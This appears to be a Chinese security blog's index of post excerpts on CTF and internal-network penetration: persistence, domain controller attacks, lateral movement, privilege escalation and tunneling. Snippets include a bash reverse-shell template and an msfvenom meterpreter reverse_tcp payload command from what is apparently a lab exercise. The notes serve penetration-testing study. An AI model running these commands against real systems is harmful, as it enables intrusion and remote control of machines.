每个恐惧背后都有个你想成为的人

HFCTF EasyLogin

打比赛真的心态很重要,一旦心气浮了可能就算知识点你会也一样做不出来 NodeJS的框架目录结构 dispatch.js 主进程文件 worker.js 工作进程 app.js 应用 routes.js url路由表 package.json 依赖模块 config.js or config/ 配置文件 controllers/ 业务逻辑相关 views/...

内网渗透之权限维持

常见则不疑

0*00 前置知识 提升权限后,攻击者往往需要建立后门来维持对目标的控制权,这样即使修复了攻击者利用的漏洞,攻击者还可以通过后门来继续控制目标机器 关于kerberos协议 kerberos使用对称密钥算法,提供双向认证服务,类似于支付宝对于买卖双方的作用。微软的Windows、苹果的Mac OS X、部分Linux操作系统都使用Kerberos身份认证。 公民小新在出生上户口时即获...

内网渗透之域控安全

取上将首级

0*00 前置知识 域控的重要性自然不必多说,这里介绍下ntds.dit文件,位于 %SystemRoot%\NTDS\ntds.dit,其中包含但不限于用户名、散列值、GPP、OU等与活动目录相关的信息,同SAM文件一样被系统锁定,正常情况下是无法读取的 PS:下面的内容主要摘自三好学生前辈的博客,三好学生牛逼! 0*01 通过卷影拷贝服务(Volume Shadow Copy Se...

内网渗透之横向移动

反复横跳

0*00 前置知识 远程连接Windows的方法: 远程桌面:多层代理环境下很难使用图形化界面进行操作 IPC:这篇文章介绍的很详细 在目标机器上开启IPC(需要目标机器已经开启139,445端口,可以实现对共享文件/打印机的访问,且开启了默认共享) net share ipc$ 在已经拿下的机器上与开放IPC的机器建立非空连接(注意:若开放IPC的机器在一个域内时只能...

内网渗透之权限提升

反客为主

0*00 前置知识 Windows中权限由高到低分一下几种 TrustedInstaller System Administrator User 0*01 溢出提权 作为web狗,对较底层的知识了解还是不够多,所以溢出提权部分集中于查找可利用的现有漏洞然后拿出相应EXP达到目的 查找可用漏洞 系统命令 wmic qfe get caption,des...

内网渗透之通信隧道

暗度陈仓

0*00 关于隧道 隧道是一种用于绕过屏蔽的方式,采用防火墙允许的方式(合法的数据包类型或者经过合法的端口)实现安全的数据传输 0*01 判断内网连通性 ICMP协议 ping TCP协议(UDP也行) netcat HTTP协议 curl命令 DNS协议 nslookup xxx.com ip dig @ip xxx.com IP用于...

提权笔记4

数据库提权

MSSQL 口令获取 SA用户具有最高权限 可以通过以下方法尝试获取其用户的口令: 查看web服务源码中的配置文件(config.php、config.asp等) 嗅探: 局域网中MSSQL登录是明文登录 暴力破解 提权 MSSQL提权的前提是SA用户 1. xp_cmdshell xp_cmdshell默认在mssql2000中是开启的,在mssql2005...

提权笔记3

Linux提权

相关命令 uname -an 系统信息 id 用户信息 pwd 当前文件夹 cat /etc/issue 获取系统版本 cat /proc/self/environ 获取环境变量 反弹shell bash -i >& /dev/[tcp|udp]/[ip]/[port] 0>&1 分解: bash -i 在本地打开一个交互式bash ...

内网渗透之信息收集

黑暗森林

0*00 前期准备以及一些情况 攻击机使用msfvenom生成payload并传给win7(192.168.1.110) msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 -f exe -o 123.exe 结合msfconsole的handle模块进行监听,在靶机上运行获取met...

提权笔记2

Windows提权

本节主要涉及的是内核提权的辅助内容 相关命令 systeminfo 系统信息包括一些补丁信息 hostname 主机名 set 环境变量 net user net1 user 查看用户信息 tasklist /svc| findstr lsass 查找指定进程的PID号 netstat -ano | find 80 查找指定端口占用情况 wmic product get ...